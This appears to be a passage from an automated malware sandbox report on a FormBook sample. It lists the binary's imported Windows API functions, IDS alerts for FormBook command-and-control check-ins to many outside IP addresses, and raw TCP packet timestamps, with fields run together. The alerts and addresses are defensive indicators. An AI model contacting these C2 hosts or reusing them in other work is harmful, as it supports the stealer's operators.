                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishGreat Britain
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-24T08:09:50.755454+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973676.223.74.7480TCP
                                                                                      2024-11-24T08:10:08.556004+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449759154.90.58.20980TCP
                                                                                      2024-11-24T08:10:11.211663+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449765154.90.58.20980TCP
                                                                                      2024-11-24T08:10:13.907738+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449771154.90.58.20980TCP
                                                                                      2024-11-24T08:10:16.659859+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449777154.90.58.20980TCP
                                                                                      2024-11-24T08:10:24.789764+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44979847.76.213.19780TCP
                                                                                      2024-11-24T08:10:27.446047+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980447.76.213.19780TCP
                                                                                      2024-11-24T08:10:30.164858+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44981047.76.213.19780TCP
                                                                                      2024-11-24T08:10:32.893304+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44981747.76.213.19780TCP
                                                                                      2024-11-24T08:10:40.198686+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44983574.48.143.8280TCP
                                                                                      2024-11-24T08:10:42.917056+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44984274.48.143.8280TCP
                                                                                      2024-11-24T08:10:45.583944+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44984874.48.143.8280TCP
                                                                                      2024-11-24T08:10:48.201147+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44985474.48.143.8280TCP
                                                                                      2024-11-24T08:10:55.017097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44987013.248.169.4880TCP
                                                                                      2024-11-24T08:10:57.596692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44988013.248.169.4880TCP
                                                                                      2024-11-24T08:11:00.312704+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44988613.248.169.4880TCP
                                                                                      2024-11-24T08:11:03.029501+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44989313.248.169.4880TCP
                                                                                      2024-11-24T08:11:10.868021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449909103.21.221.8780TCP
                                                                                      2024-11-24T08:11:13.540115+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449917103.21.221.8780TCP
                                                                                      2024-11-24T08:11:16.211740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449924103.21.221.8780TCP
                                                                                      2024-11-24T08:11:18.959244+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449931103.21.221.8780TCP
                                                                                      2024-11-24T08:11:27.930490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499528.210.46.2180TCP
                                                                                      2024-11-24T08:11:30.602583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499588.210.46.2180TCP
                                                                                      2024-11-24T08:11:33.274209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499658.210.46.2180TCP
                                                                                      2024-11-24T08:11:36.004913+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4499728.210.46.2180TCP
                                                                                      2024-11-24T08:11:42.908358+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449991203.161.43.22880TCP
                                                                                      2024-11-24T08:11:45.590373+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449997203.161.43.22880TCP
                                                                                      2024-11-24T08:11:48.403824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450004203.161.43.22880TCP
                                                                                      2024-11-24T08:11:50.893888+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450010203.161.43.22880TCP
                                                                                      2024-11-24T08:11:57.671231+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002613.248.169.4880TCP
                                                                                      2024-11-24T08:12:00.297566+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003213.248.169.4880TCP
                                                                                      2024-11-24T08:12:03.062130+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003313.248.169.4880TCP
                                                                                      2024-11-24T08:12:05.646132+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003413.248.169.4880TCP
                                                                                      2024-11-24T08:12:12.741219+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035147.255.21.18780TCP
                                                                                      2024-11-24T08:12:15.407420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036147.255.21.18780TCP
                                                                                      2024-11-24T08:12:18.190723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037147.255.21.18780TCP
                                                                                      2024-11-24T08:12:20.825674+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450038147.255.21.18780TCP
                                                                                      2024-11-24T08:12:27.641372+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039104.21.42.7780TCP
                                                                                      2024-11-24T08:12:30.335831+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040104.21.42.7780TCP
                                                                                      2024-11-24T08:12:33.076962+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041104.21.42.7780TCP
                                                                                      2024-11-24T08:12:35.945886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450042104.21.42.7780TCP
                                                                                      2024-11-24T08:12:43.368138+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450043172.67.168.22880TCP
                                                                                      2024-11-24T08:12:46.040089+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044172.67.168.22880TCP
                                                                                      2024-11-24T08:12:48.715939+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045172.67.168.22880TCP
                                                                                      2024-11-24T08:12:51.493441+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450046172.67.168.22880TCP
                                                                                      2024-11-24T08:12:58.667448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047194.58.112.17480TCP
                                                                                      2024-11-24T08:13:01.334384+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048194.58.112.17480TCP
                                                                                      2024-11-24T08:13:03.997525+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049194.58.112.17480TCP
                                                                                      2024-11-24T08:13:06.696046+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450050194.58.112.17480TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 24, 2024 08:09:49.474462032 CET4973680192.168.2.476.223.74.74
                                                                                      Nov 24, 2024 08:09:49.594149113 CET804973676.223.74.74192.168.2.4
                                                                                      Nov 24, 2024 08:09:49.594307899 CET4973680192.168.2.476.223.74.74
                                                                                      Nov 24, 2024 08:09:49.603538990 CET4973680192.168.2.476.223.74.74
                                                                                      Nov 24, 2024 08:09:49.723237038 CET804973676.223.74.74192.168.2.4
                                                                                      Nov 24, 2024 08:09:50.755297899 CET804973676.223.74.74192.168.2.4
                                                                                      Nov 24, 2024 08:09:50.755352020 CET804973676.223.74.74192.168.2.4
                                                                                      Nov 24, 2024 08:09:50.755454063 CET4973680192.168.2.476.223.74.74
                                                                                      Nov 24, 2024 08:09:50.758902073 CET4973680192.168.2.476.223.74.74
                                                                                      Nov 24, 2024 08:09:50.878360987 CET804973676.223.74.74192.168.2.4
                                                                                      Nov 24, 2024 08:10:06.915112972 CET4975980192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:07.034673929 CET8049759154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:07.034780979 CET4975980192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:07.050307989 CET4975980192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:07.169965029 CET8049759154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:08.556004047 CET4975980192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:08.676088095 CET8049759154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:08.676155090 CET4975980192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:09.574652910 CET4976580192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:09.694267988 CET8049765154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:09.694358110 CET4976580192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:09.706563950 CET4976580192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:09.826179028 CET8049765154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:11.211663008 CET4976580192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:11.331700087 CET8049765154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:11.331815958 CET4976580192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:12.230755091 CET4977180192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:12.350389004 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.350471020 CET4977180192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:12.367130995 CET4977180192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:12.486891031 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.486932993 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.486988068 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487015009 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487047911 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487075090 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487154961 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487185955 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:12.487289906 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:13.907737970 CET4977180192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:14.027832985 CET8049771154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:14.028032064 CET4977180192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:14.918665886 CET4977780192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:15.038443089 CET8049777154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:15.038754940 CET4977780192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:15.048355103 CET4977780192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:15.168047905 CET8049777154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:16.659656048 CET8049777154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:16.659785986 CET8049777154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:16.659858942 CET4977780192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:16.682159901 CET4977780192.168.2.4154.90.58.209
                                                                                      Nov 24, 2024 08:10:16.801784992 CET8049777154.90.58.209192.168.2.4
                                                                                      Nov 24, 2024 08:10:23.141345978 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:23.261109114 CET804979847.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:23.261254072 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:23.275626898 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:23.395226955 CET804979847.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:24.789763927 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:24.857832909 CET804979847.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:24.857983112 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:24.858050108 CET804979847.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:24.858107090 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:24.911758900 CET804979847.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:24.911879063 CET4979880192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:25.808926105 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:25.928591967 CET804980447.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:25.928719044 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:25.944946051 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:26.064831018 CET804980447.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:27.446047068 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:27.528074026 CET804980447.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:27.528117895 CET804980447.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:27.528189898 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:27.528255939 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:27.566112995 CET804980447.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:27.566248894 CET4980480192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:28.513802052 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:28.633403063 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.633516073 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:28.650484085 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:28.770411015 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770452023 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770493984 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770545959 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770603895 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770633936 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770693064 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770791054 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:28.770823956 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.164858103 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.245706081 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.245748997 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.245879889 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.249417067 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:30.284652948 CET804981047.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:30.285429955 CET4981080192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.211956024 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.331593990 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:31.331707954 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.342281103 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:31.461956978 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893115997 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893142939 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:32.893304110 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:32.896217108 CET4981780192.168.2.447.76.213.197
                                                                                      Nov 24, 2024 08:10:33.015639067 CET804981747.76.213.197192.168.2.4
                                                                                      Nov 24, 2024 08:10:38.859672070 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:38.979362011 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:38.979496002 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:38.993603945 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:39.113444090 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198443890 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198467016 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198487043 CET804983574.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:40.198685884 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:40.508609056 CET4983580192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.529026031 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.648956060 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:41.651444912 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.666551113 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:41.786156893 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.916935921 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.917006016 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.917056084 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:42.918179035 CET804984274.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:42.918226004 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:43.180613995 CET4984280192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.199588060 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.319196939 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.319303989 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.335087061 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:44.454942942 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.455558062 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.456999063 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.457120895 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458867073 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458978891 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458988905 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.458997965 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:44.459007025 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583853006 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583875895 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583925009 CET804984874.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:45.583944082 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:45.584038019 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:45.836669922 CET4984880192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.856529951 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.976315022 CET804985474.48.143.82192.168.2.4
                                                                                      Nov 24, 2024 08:10:46.976495981 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:46.991288900 CET4985480192.168.2.474.48.143.82
                                                                                      Nov 24, 2024 08:10:47.110841990 CET804985474.48.143.82192.168.2.4
